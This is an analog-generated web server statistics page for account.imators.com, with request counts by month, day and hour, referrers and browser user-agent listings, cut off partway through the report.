6.0</a>. <br /><span class="runtimetitle">Running time:</span> Less than 1 second. </p> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> </div> </body> </html> PK J�[�|R#ԟ ԟ 3.htmlnu �[��� <?xml version="1.0" encoding="ISO-8859-1"?> <?xml-stylesheet href="#internalStyle" type="text/css"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Web Server Statistics for account.imators.com</title> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <meta name="robots" content="noindex,nofollow" /> <meta name="generator" content="analog 6.0/Unix" /> <style type="text/css" id="internalStyle"> h2 { background-color: #A0C0F0; width: 98%; padding: 3px 6px; } table { text-align: right; margin-left: 30px; background-color: #D0E0F0; border-collapse: collapse; } th { border-bottom: 1px solid #404050; border-right: 1px dotted #606070; border-top: none; border-left: none; padding: 0px 5px 1px 5px; font-weight: bold; background-color: #A0C0F0; } td { padding: 0px 5px 1px 5px; border-right: 1px dotted #606070; border-left: none; border-bottom: none; border-top:none; } td.x { font-family: monospace; white-space: pre; } .xl { text-align: left; border-right: none; } .xr { text-align: right; border-right: none; } .bar { text-align: left; border-right: none; } tr.sub {background-color: #C0C0FF; font-style: italic; } .repdesc { font-style: italic; } .repspan { font-style: italic; } .goto { font-size: small; } .gensumtitle { font-weight: bold; } .gototitle { font-weight: bold; } .runtimetitle { font-weight: bold; } img { border-style: none; } a:link { color: blue; text-decoration: none; } a:visited { color: purple; text-decoration: none; } a:link:hover { text-decoration: underline; } a:visited:hover { text-decoration: underline; } a:link:active { color: red; text-decoration: underline; } a:visited:active { color: red; text-decoration: underline; } </style> </head> <body> <div class="header"><h1><a name="Top" id="Top" href="http://www.analog.cx/"><img src="/images/analogo.png" alt="" /></a> Web Server Statistics for <a href="http://account.imators.com/">account.imators.com</a></h1> <p class="analysisspan">Program started on Wed, Mar 26 2025 at 1:10 PM. <br />Analyzed requests from Sun, Nov 03 2024 at 3:43 PM to Wed, Mar 26 2025 at 5:50 AM (142.59 days).</p> </div> <div class="gensum"><h2><a name="gensum" id="gensum">General Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | General Summary | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="lastseven">Figures in parentheses refer to the 7-day period ending Mar 26 2025 at 1:10 PM.</p> <p class="gensumlines"> <span class="gensumtitle">Successful requests:</span> 273 (6) <br /><span class="gensumtitle">Average successful requests per day:</span> 1 (0) <br /><span class="gensumtitle">Successful requests for pages:</span> 150 (5) <br /><span class="gensumtitle">Average successful requests for pages per day:</span> 1 (0) <br /><span class="gensumtitle">Failed requests:</span> 234 (0) <br /><span class="gensumtitle">Distinct files requested:</span> 23 (96) <br /><span class="gensumtitle">Distinct hosts served:</span> 144 (179) <br /><span class="gensumtitle">Data transferred:</span> 227.37 kilobytes (4.62 kilobytes) <br /><span class="gensumtitle">Average data transferred per day:</span> 1.59 kilobytes (676 bytes) </p> </div><div class="month"><h2><a name="month" id="month">Monthly Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | Monthly Report | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 2 requests for pages or part thereof.</p> <table> <thead><tr><th class="x">month</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x">Nov 2024</td><td class="R">130</td><td class="P">60</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Dec 2024</td><td class="R">16</td><td class="P">14</td><td class="bar"><img src="/images/barb4.png" alt="+++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> </td><td class="R"> </td><td class="P"> </td><td class="bar"> </td></tr> <tr><td class="x">Jan 2025</td><td class="R">55</td><td class="P">29</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Feb 2025</td><td class="R">12</td><td class="P">12</td><td class="bar"><img src="/images/barb4.png" alt="++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Mar 2025</td><td class="R">60</td><td class="P">35</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr> </tbody></table> <p class="busiesttime">Busiest month: Nov 2024 (60 requests for pages).</p> </div><div class="daysum"><h2><a name="daysum" id="daysum">Daily Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | Daily Summary | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 1 request for a page.</p> <table> <thead><tr><th class="x">day</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x">Sun</td><td class="R">83</td><td class="P">38</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Mon</td><td class="R">37</td><td class="P">15</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Tue</td><td class="R">8</td><td class="P">6</td><td class="bar"><img src="/images/barb4.png" alt="++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Wed</td><td class="R">40</td><td class="P">21</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Thu</td><td class="R">23</td><td class="P">19</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Fri</td><td class="R">61</td><td class="P">37</td><td class="bar"><img src="/images/barb32.png" alt="+++++++++++++++++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Sat</td><td class="R">21</td><td class="P">14</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> </tbody></table> </div><div class="hoursum"><h2><a name="hoursum" id="hoursum">Hourly Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | Hourly Summary | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 1 request for a page.</p> <table> <thead><tr><th class="x">hour</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x"> 0</td><td class="R">18</td><td class="P">8</td><td class="bar"><img src="/images/barb8.png" alt="++++++++" /></td></tr> <tr><td class="x"> 1</td><td class="R">1</td><td class="P">1</td><td class="bar"><img src="/images/barb1.png" alt="+" /></td></tr> <tr><td class="x"> 2</td><td class="R">4</td><td class="P">4</td><td class="bar"><img src="/images/barb4.png" alt="++++" /></td></tr> <tr><td class="x"> 3</td><td class="R">10</td><td class="P">8</td><td class="bar"><img src="/images/barb8.png" alt="++++++++" /></td></tr> <tr><td class="x"> 4</td><td class="R">10</td><td class="P">6</td><td class="bar"><img src="/images/barb4.png" alt="++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x"> 5</td><td class="R">4</td><td class="P">3</td><td class="bar"><img src="/images/barb2.png" alt="+++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 6</td><td class="R">4</td><td class="P">2</td><td class="bar"><img src="/images/barb2.png" alt="++" /></td></tr> <tr><td class="x"> 7</td><td class="R">2</td><td class="P">2</td><td class="bar"><img src="/images/barb2.png" alt="++" /></td></tr> <tr><td class="x"> 8</td><td class="R">1</td><td class="P">1</td><td class="bar"><img src="/images/barb1.png" alt="+" /></td></tr> <tr><td class="x"> 9</td><td class="R">26</td><td class="P">10</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">10</td><td class="R">7</td><td class="P">7</td><td class="bar"><img src="/images/barb4.png" alt="+++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">11</td><td class="R">1</td><td class="P">1</td><td class="bar"><img src="/images/barb1.png" alt="+" /></td></tr> <tr><td class="x">12</td><td class="R">5</td><td class="P">4</td><td class="bar"><img src="/images/barb4.png" alt="++++" /></td></tr> <tr><td class="x">13</td><td class="R">2</td><td class="P">2</td><td class="bar"><img src="/images/barb2.png" alt="++" /></td></tr> <tr><td class="x">14</td><td class="R">13</td><td class="P">13</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">15</td><td class="R">38</td><td class="P">15</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">16</td><td class="R">45</td><td class="P">23</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">17</td><td class="R">40</td><td class="P">10</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">18</td><td class="R">9</td><td class="P">5</td><td class="bar"><img src="/images/barb4.png" alt="+++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">19</td><td class="R">9</td><td class="P">3</td><td class="bar"><img src="/images/barb2.png" alt="+++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">20</td><td class="R">10</td><td class="P">8</td><td class="bar"><img src="/images/barb8.png" alt="++++++++" /></td></tr> <tr><td class="x">21</td><td class="R">4</td><td class="P">4</td><td class="bar"><img src="/images/barb4.png" alt="++++" /></td></tr> <tr><td class="x">22</td><td class="R">9</td><td class="P">9</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">23</td><td class="R">1</td><td class="P">1</td><td class="bar"><img src="/images/barb1.png" alt="+" /></td></tr> </tbody></table> </div><div class="dom"><h2><a name="dom" id="dom">Domain Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | Domain Report | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="whatinc"> Listing domains, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">domain</th></tr></thead> <tbody><tr><td class="R">273</td><td class="b">100%</td><td class="xl">[unresolved numerical addresses]</td></tr> </tbody></table> </div><div class="org"><h2><a name="org" id="org">Organization Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | Organization Report | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./org.png" alt="" /></p> <p class="whatinc"> Listing the top 20 organizations by the number of requests, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">organization</th></tr></thead> <tbody><tr><td class="R">66</td><td class="b">28.28%</td><td class="xl">205.169</td></tr> <tr><td class="R">23</td><td class="b">10.09%</td><td class="xl">44</td></tr> <tr><td class="R">19</td><td class="b"> 8.78%</td><td class="xl">34</td></tr> <tr><td class="R">19</td><td class="b"> 7.34%</td><td class="xl">54</td></tr> <tr><td class="R">13</td><td class="b"> 4.85%</td><td class="xl">35</td></tr> <tr><td class="R">12</td><td class="b"> 6.51%</td><td class="xl">205.210</td></tr> <tr><td class="R">9</td><td class="b"> 2.38%</td><td class="xl">167.94</td></tr> <tr><td class="R">9</td><td class="b"> 2.93%</td><td class="xl">3</td></tr> <tr><td class="R">6</td><td class="b"> 2.70%</td><td class="xl">138.68</td></tr> <tr><td class="R">6</td><td class="b"> 0.16%</td><td class="xl">194.87</td></tr> <tr><td class="R">6</td><td class="b"> 2.15%</td><td class="xl">64.227</td></tr> <tr><td class="R">4</td><td class="b"> 2.17%</td><td class="xl">192.175</td></tr> <tr><td class="R">4</td><td class="b"> 2.17%</td><td class="xl">198.235</td></tr> <tr><td class="R">4</td><td class="b"> 1.06%</td><td class="xl">138.197</td></tr> <tr><td class="R">4</td><td class="b"> 1.06%</td><td class="xl">87</td></tr> <tr><td class="R">3</td><td class="b"> 0.11%</td><td class="xl">16</td></tr> <tr><td class="R">3</td><td class="b"> 0.34%</td><td class="xl">18</td></tr> <tr><td class="R">3</td><td class="b"> 0.79%</td><td class="xl">161.35</td></tr> <tr><td class="R">3</td><td class="b"> 0.59%</td><td class="xl">104</td></tr> <tr><td class="R">3</td><td class="b"> 0.79%</td><td class="xl">162.142</td></tr> <tr><td class="R">54</td><td class="b">14.73%</td><td class="xl">[not listed: 35 organizations]</td></tr> </tbody></table> </div><div class="failref"><h2><a name="failref" id="failref">Failed Referrer Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | Failed Referrer Report | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./failref.png" alt="" /></p> <p class="whatinc"> Listing referring URLs, sorted by the number of failed requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">URL</th></tr></thead> <tbody><tr><td class="R">25</td><td class="xl"><a href="http://www.account.imators.com/">http://www.account.imators.com/</a></td></tr> <tr><td class="R">10</td><td class="xl"><a href="http://account.imators.com/">http://account.imators.com/</a></td></tr> </tbody></table> </div><div class="refsite"><h2><a name="refsite" id="refsite">Referring Site Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | Referring Site Report | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./refsite.png" alt="" /></p> <p class="whatinc"> Listing referring sites, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">site</th></tr></thead> <tbody><tr><td class="R">58</td><td class="xl">http://www.account.imators.com/</td></tr> <tr><td class="R">30</td><td class="xl">http://account.imators.com/</td></tr> </tbody></table> </div><div class="browrep"><h2><a name="browrep" id="browrep">Browser Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | Browser Report | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./browrep.png" alt="" /></p> <p class="whatinc"> Listing browsers with at least 1 request for a page, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">browser</th></tr></thead> <tbody><tr><td class="R">26</td><td class="P">26</td><td class="xl">Mozilla/5.0 (compatible)</td></tr> <tr><td class="R">17</td><td class="P">17</td><td class="xl">Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)</td></tr> <tr><td class="R">9</td><td class="P">9</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36</td></tr> <tr><td class="R">7</td><td class="P">7</td><td class="xl">Go-http-client/1.1</td></tr> <tr><td class="R">30</td><td class="P">6</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36</td></tr> <tr><td class="R">5</td><td class="P">5</td><td class="xl">Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)</td></tr> <tr><td class="R">12</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36</td></tr> <tr><td class="R">12</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19582</td></tr> <tr><td class="R">20</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36</td></tr> <tr><td class="R">3</td><td class="P">3</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36</td></tr> <tr><td class="R">3</td><td class="P">3</td><td class="xl">Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)</td></tr> <tr><td class="R">3</td><td class="P">3</td><td class="xl">Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA540537) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.3260.98 Mobile Safari/537.3</td></tr> <tr><td class="R">11</td><td class="P">3</td><td class="xl">Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Mobile/15E148 Safari/604.1</td></tr> <tr><td class="R">10</td><td class="P">2</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/92.0.4515.159 Safari/537.36</td></tr> <tr><td class="R">2</td><td class="P">2</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11</td></tr> <tr><td class="R">10</td><td class="P">2</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/125.0.6422.60 Safari/537.36</td></tr> <tr><td class="R">2</td><td class="P">2</td><td class="xl">Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36</td></tr> <tr><td class="R">2</td><td class="P">2</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0</td></tr> <tr><td class="R">6</td><td class="P">2</td><td class="xl">Mozilla/5.0 (Linux; Android 8.0.0; SM-G965U Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Edg/112.0.1722.68</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 Chrome/120.0.0.0</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0</td></tr> <tr><td class="R">5</td><td class="P">1</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (compatible; archive.org_bot +http://archive.org/details/archive.org_bot) Zeno/2865beb warc/v0.8.73</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (Linux; Android 14) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.80 Mobile Safari/537.36</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">python-requests/2.31.0</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (compatible; wpbot/1.2; +https://forms.gle/ajBaxygz9jSR8p8G9)</td></tr> <tr><td class="R">4</td><td class="P">1</td><td class="xl">Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (Linux; Android 9; LEX829) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/10.1 Chrome/71.0.3578.99 Mobile Safari/537.36</td></tr> <tr><td class="R">32</td><td class="P">0</td><td class="xl">[not listed: 7 browsers]</td></tr> </tbody></table> </div><div class="browsum"><h2><a name="browsum" id="browsum">Browser Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | Browser Summary | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./browsum.png" alt="" /></p> <p class="whatinc"> Listing browsers with at least 1 request for a page, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="N"> #</th><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">browser</th></tr></thead> <tbody><tr><td class="N">1</td><td class="R">155</td><td class="P">63</td><td class="xl">Safari</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">142</td><td class="P">58</td><td class="xl"> Safari/537</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">11</td><td class="P">3</td><td class="xl"> Safari/604</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">2</td><td class="P">2</td><td class="xl"> Safari/535</td></tr> <tr><td class="N">2</td><td class="R">67</td><td class="P">53</td><td class="xl">Netscape (compatible)</td></tr> <tr><td class="N">3</td><td class="R">7</td><td class="P">7</td><td class="xl">Go-http-client</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">7</td><td class="P">7</td><td class="xl"> Go-http-client/1</td></tr> <tr><td class="N">4</td><td class="R">6</td><td class="P">6</td><td class="xl">Firefox</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">4</td><td class="P">4</td><td class="xl"> Firefox/65</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> Firefox/130</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> Firefox/24</td></tr> <tr><td class="N">5</td><td class="R">3</td><td class="P">1</td><td class="xl">Mozilla</td></tr> <tr><td class="N">6</td><td class="R">1</td><td class="P">1</td><td class="xl">python-requests</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> python-requests/2</td></tr> <tr><td class="N"> </td><td class="R">15</td><td class="P">0</td><td class="xl">[not listed: 3 browsers]</td></tr> </tbody></table> </div><div class="os"><h2><a name="os" id="os">Operating System Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a 